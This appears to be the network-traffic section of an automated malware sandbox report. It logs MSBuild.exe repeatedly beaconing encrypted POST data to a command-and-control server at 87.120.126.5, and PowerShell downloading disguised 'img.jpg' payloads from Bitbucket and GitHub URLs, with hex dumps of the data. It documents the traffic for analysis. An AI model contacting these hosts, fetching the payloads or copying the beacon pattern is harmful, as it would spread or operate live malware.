                                                                                                                    Jan 3, 2025 23:22:16.843585014 CET175INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.22.1
                                                                                                                    Date: Fri, 03 Jan 2025 22:22:16 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.45001387.120.126.5807256C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 3, 2025 23:22:26.373194933 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                                                                                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Host: 87.120.126.5
                                                                                                                    Content-Length: 471
                                                                                                                    Expect: 100-continue
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 3, 2025 23:22:26.728207111 CET471OUTData Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
                                                                                                                    Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
                                                                                                                    Jan 3, 2025 23:22:26.964682102 CET25INHTTP/1.1 100 Continue
                                                                                                                    Jan 3, 2025 23:22:27.098423004 CET175INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.22.1
                                                                                                                    Date: Fri, 03 Jan 2025 22:22:26 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.45001487.120.126.5807256C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 3, 2025 23:22:43.107999086 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                                                                                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Host: 87.120.126.5
                                                                                                                    Content-Length: 471
                                                                                                                    Expect: 100-continue
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 3, 2025 23:22:43.461318016 CET471OUTData Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
                                                                                                                    Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
                                                                                                                    Jan 3, 2025 23:22:43.714971066 CET25INHTTP/1.1 100 Continue
                                                                                                                    Jan 3, 2025 23:22:44.018284082 CET175INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.22.1
                                                                                                                    Date: Fri, 03 Jan 2025 22:22:43 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    8192.168.2.45001587.120.126.5807256C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 3, 2025 23:22:56.982426882 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                                                                                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Host: 87.120.126.5
                                                                                                                    Content-Length: 471
                                                                                                                    Expect: 100-continue
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 3, 2025 23:22:57.336338043 CET471OUTData Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
                                                                                                                    Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
                                                                                                                    Jan 3, 2025 23:22:57.591558933 CET25INHTTP/1.1 100 Continue
                                                                                                                    Jan 3, 2025 23:22:57.720423937 CET175INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.22.1
                                                                                                                    Date: Fri, 03 Jan 2025 22:22:57 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    9192.168.2.45001687.120.126.5807256C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 3, 2025 23:23:09.045113087 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                                                                                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Host: 87.120.126.5
                                                                                                                    Content-Length: 471
                                                                                                                    Expect: 100-continue
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 3, 2025 23:23:09.398834944 CET471OUTData Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
                                                                                                                    Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
                                                                                                                    Jan 3, 2025 23:23:09.654040098 CET25INHTTP/1.1 100 Continue
                                                                                                                    Jan 3, 2025 23:23:09.782094955 CET175INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.22.1
                                                                                                                    Date: Fri, 03 Jan 2025 22:23:09 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    10192.168.2.45001787.120.126.5807256C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 3, 2025 23:23:25.921148062 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                                                                                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Host: 87.120.126.5
                                                                                                                    Content-Length: 471
                                                                                                                    Expect: 100-continue
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 3, 2025 23:23:26.273931980 CET471OUTData Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
                                                                                                                    Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
                                                                                                                    Jan 3, 2025 23:23:26.562422037 CET25INHTTP/1.1 100 Continue
                                                                                                                    Jan 3, 2025 23:23:26.993798018 CET175INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.22.1
                                                                                                                    Date: Fri, 03 Jan 2025 22:23:26 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    11192.168.2.45001887.120.126.5807256C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 3, 2025 23:23:33.529773951 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                                                                                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Host: 87.120.126.5
                                                                                                                    Content-Length: 471
                                                                                                                    Expect: 100-continue
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 3, 2025 23:23:33.889066935 CET471OUTData Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
                                                                                                                    Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
                                                                                                                    Jan 3, 2025 23:23:34.166520119 CET25INHTTP/1.1 100 Continue
                                                                                                                    Jan 3, 2025 23:23:34.290971994 CET175INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.22.1
                                                                                                                    Date: Fri, 03 Jan 2025 22:23:34 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    12192.168.2.45001987.120.126.5807256C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 3, 2025 23:23:49.572565079 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                                                                                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Host: 87.120.126.5
                                                                                                                    Content-Length: 471
                                                                                                                    Expect: 100-continue
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 3, 2025 23:23:49.932035923 CET471OUTData Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
                                                                                                                    Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
                                                                                                                    Jan 3, 2025 23:23:50.671550989 CET200INHTTP/1.1 100 Continue
                                                                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 33 20 4a 61 6e 20 32 30 32 35 20 32 32 3a 32 33 3a 35 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Fri, 03 Jan 2025 22:23:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alive0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    13192.168.2.45002087.120.126.5807256C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 3, 2025 23:24:00.811736107 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                                                                                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Host: 87.120.126.5
                                                                                                                    Content-Length: 471
                                                                                                                    Expect: 100-continue
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 3, 2025 23:24:01.164522886 CET471OUTData Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
                                                                                                                    Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
                                                                                                                    Jan 3, 2025 23:24:01.422911882 CET25INHTTP/1.1 100 Continue
                                                                                                                    Jan 3, 2025 23:24:01.554022074 CET175INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.22.1
                                                                                                                    Date: Fri, 03 Jan 2025 22:24:01 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.449730185.166.143.484438000C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-03 22:19:59 UTC109OUTGET /ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612 HTTP/1.1
                                                                                                                    Host: bitbucket.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-03 22:20:00 UTC5894INHTTP/1.1 302 Found
                                                                                                                    Date: Fri, 03 Jan 2025 22:20:00 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Content-Length: 0
                                                                                                                    Server: AtlassianEdge
                                                                                                                    Location: https://bbuseruploads.s3.amazonaws.com/d0a43d21-72a8-4789-9e4a-6c02f03bb585/downloads/196619b4-f993-4aa1-be6b-8d7a85109d1d/img.jpg?response-content-disposition=attachment%3B%20filename%3D%22img.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNB2WPJBXR&Signature=lwsP7gnHd8roKWARL5%2F30w838OY%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEB8aCXVzLWVhc3QtMSJIMEYCIQD1adYtJEPex4fpYw9bPcmyyvKVwy116rMoDm5E%2Fgtj%2FwIhALd5RVlGK9zMCQQpLrc%2FhZRZdW5gCLL47O4597JcPhFIKrACCPf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2Igz9QKdLM7hLvedkt0cqhAJjtPVgfS4lbtP5ZWuNkq3HFL6RMdJqizq6t2mvLFRfJy3ZxwRKOcpbdrfV9tUisFtfPiuyq2WKMcEIoI0OwpVnm%2Fe2%2F0iHI3o3H0TiE0DKUaWAhvVlOpLvEhQH6V9SO%2B%2BULgQykt1E5HQovRoplqfgP0CPB9UehzKwX2XXeqQyJ7pE6a2j1ErGZ1nOhe9MJ9WvJ5uWk%2B1Pce3NnlacDrMzabgdcLjnwRWJqz30v0DVM7aXxuFrLgUSuokPrtch6F6a8EBg2xCT9SkyXrbGLYZ7abgVOQYQ62R8lW6cKsAYYdnIv3TjvCANyTjYWcR0DJXUhriKzvyqOpohFKcmMBvM7J6zaDCQxeG7BjqcAai%2F1elj%2Fq3HjAkGO0zugvQxRQPBpHCDPTtXGMbgLGNCWDni0iJCn2TanguAdRMbFOZ0N%2BtdrIlt1H1dva9ZFWfAXuXQXodE7R5kF7GJgG8EK3PCgG%2BMy [TRUNCATED]
                                                                                                                    Expires: Fri, 03 Jan 2025 22:20:00 GMT
                                                                                                                    Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                    X-Used-Mesh: False
                                                                                                                    Vary: Accept-Language, Origin
                                                                                                                    Content-Language: en
                                                                                                                    X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                    X-Dc-Location: Micros-3
                                                                                                                    X-Served-By: b40ab98214d9
                                                                                                                    X-Version: c9b3998323c0
                                                                                                                    X-Static-Version: c9b3998323c0
                                                                                                                    X-Request-Count: 592
                                                                                                                    X-Render-Time: 0.5190036296844482
                                                                                                                    X-B3-Traceid: 38d2945ed9f84287866830d22cf27d9b
                                                                                                                    X-B3-Spanid: 91770a058436b90e
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Content-Security-Policy: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--cate [TRUNCATED]
                                                                                                                    X-Usage-Quota-Remaining: 987364.382
                                                                                                                    X-Usage-Request-Cost: 12781.07
                                                                                                                    X-Usage-User-Time: 0.310753
                                                                                                                    X-Usage-System-Time: 0.072679
                                                                                                                    X-Usage-Input-Ops: 0
                                                                                                                    X-Usage-Output-Ops: 0
                                                                                                                    Age: 0
                                                                                                                    X-Cache: MISS
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-Xss-Protection: 1; mode=block
                                                                                                                    Atl-Traceid: 38d2945ed9f84287866830d22cf27d9b
                                                                                                                    Atl-Request-Id: 38d2945e-d9f8-4287-8668-30d22cf27d9b
                                                                                                                    Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                    Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                    Server-Timing: atl-edge;dur=626,atl-edge-internal;dur=3,atl-edge-upstream;dur=625,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.449731185.199.111.1334438000C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-03 22:20:00 UTC121OUTGET /gmedusa135/nano/refs/heads/main/new_img123.jpg HTTP/1.1
                                                                                                                    Host: raw.githubusercontent.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-03 22:20:00 UTC888INHTTP/1.1 200 OK
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 4697658
                                                                                                                    Cache-Control: max-age=300
                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                    Content-Type: image/jpeg
                                                                                                                    ETag: "b899cc7aa3319a16e239ba6cb263113b100d6fa7ed0190f683f329a66758220c"
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-Frame-Options: deny
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    X-GitHub-Request-Id: 2A68:16C754:465444:4D7ACD:67786290
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Date: Fri, 03 Jan 2025 22:20:00 GMT
                                                                                                                    Via: 1.1 varnish
                                                                                                                    X-Served-By: cache-ewr-kewr1740062-EWR
                                                                                                                    X-Cache: MISS
                                                                                                                    X-Cache-Hits: 0
                                                                                                                    X-Timer: S1735942801.849083,VS0,VE56
                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                    X-Fastly-Request-ID: 17276533fe8f283df1821fb9ee95a5fbba9c91e0
                                                                                                                    Expires: Fri, 03 Jan 2025 22:25:00 GMT
                                                                                                                    Source-Age: 0
                                                                                                                    2025-01-03 22:20:00 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 01 00 48 00 48 00 00 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64
                                                                                                                    Data Ascii: JFIFHHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@d
                                                                                                                    2025-01-03 22:20:00 UTC1378INData Raw: 03 66 03 72 03 7e 03 8a 03 96 03 a2 03 ae 03 ba 03 c7 03 d3 03 e0 03 ec 03 f9 04 06 04 13 04 20 04 2d 04 3b 04 48 04 55 04 63 04 71 04 7e 04 8c 04 9a 04 a8 04 b6 04 c4 04 d3 04 e1 04 f0 04 fe 05 0d 05 1c 05 2b 05 3a 05 49 05 58 05 67 05 77 05 86 05 96 05 a6 05 b5 05 c5 05 d5 05 e5 05 f6 06 06 06 16 06 27 06 37 06 48 06 59 06 6a 06 7b 06 8c 06 9d 06 af 06 c0 06 d1 06 e3 06 f5 07 07 07 19 07 2b 07 3d 07 4f 07 61 07 74 07 86 07 99 07 ac 07 bf 07 d2 07 e5 07 f8 08 0b 08 1f 08 32 08 46 08 5a 08 6e 08 82 08 96 08 aa 08 be 08 d2 08 e7 08 fb 09 10 09 25 09 3a 09 4f 09 64 09 79 09 8f 09 a4 09 ba 09 cf 09 e5 09 fb 0a 11 0a 27 0a 3d 0a 54 0a 6a 0a 81 0a 98 0a ae 0a c5 0a dc 0a f3 0b 0b 0b 22 0b 39 0b 51 0b 69 0b 80 0b 98 0b b0 0b c8 0b e1 0b f9 0c 12 0c 2a 0c 43 0c
                                                                                                                    Data Ascii: fr~ -;HUcq~+:IXgw'7HYj{+=Oat2FZn%:Ody'=Tj"9Qi*C
                                                                                                                    2025-01-03 22:20:00 UTC1378INData Raw: 97 75 97 e0 98 4c 98 b8 99 24 99 90 99 fc 9a 68 9a d5 9b 42 9b af 9c 1c 9c 89 9c f7 9d 64 9d d2 9e 40 9e ae 9f 1d 9f 8b 9f fa a0 69 a0 d8 a1 47 a1 b6 a2 26 a2 96 a3 06 a3 76 a3 e6 a4 56 a4 c7 a5 38 a5 a9 a6 1a a6 8b a6 fd a7 6e a7 e0 a8 52 a8 c4 a9 37 a9 a9 aa 1c aa 8f ab 02 ab 75 ab e9 ac 5c ac d0 ad 44 ad b8 ae 2d ae a1 af 16 af 8b b0 00 b0 75 b0 ea b1 60 b1 d6 b2 4b b2 c2 b3 38 b3 ae b4 25 b4 9c b5 13 b5 8a b6 01 b6 79 b6 f0 b7 68 b7 e0 b8 59 b8 d1 b9 4a b9 c2 ba 3b ba b5 bb 2e bb a7 bc 21 bc 9b bd 15 bd 8f be 0a be 84 be ff bf 7a bf f5 c0 70 c0 ec c1 67 c1 e3 c2 5f c2 db c3 58 c3 d4 c4 51 c4 ce c5 4b c5 c8 c6 46 c6 c3 c7 41 c7 bf c8 3d c8 bc c9 3a c9 b9 ca 38 ca b7 cb 36 cb b6 cc 35 cc b5 cd 35 cd b5 ce 36 ce b6 cf 37 cf b8 d0 39 d0 ba d1 3c d1 be d2
                                                                                                                    Data Ascii: uL$hBd@iG&vV8nR7u\D-u`K8%yhYJ;.!zpg_XQKFA=:8655679<
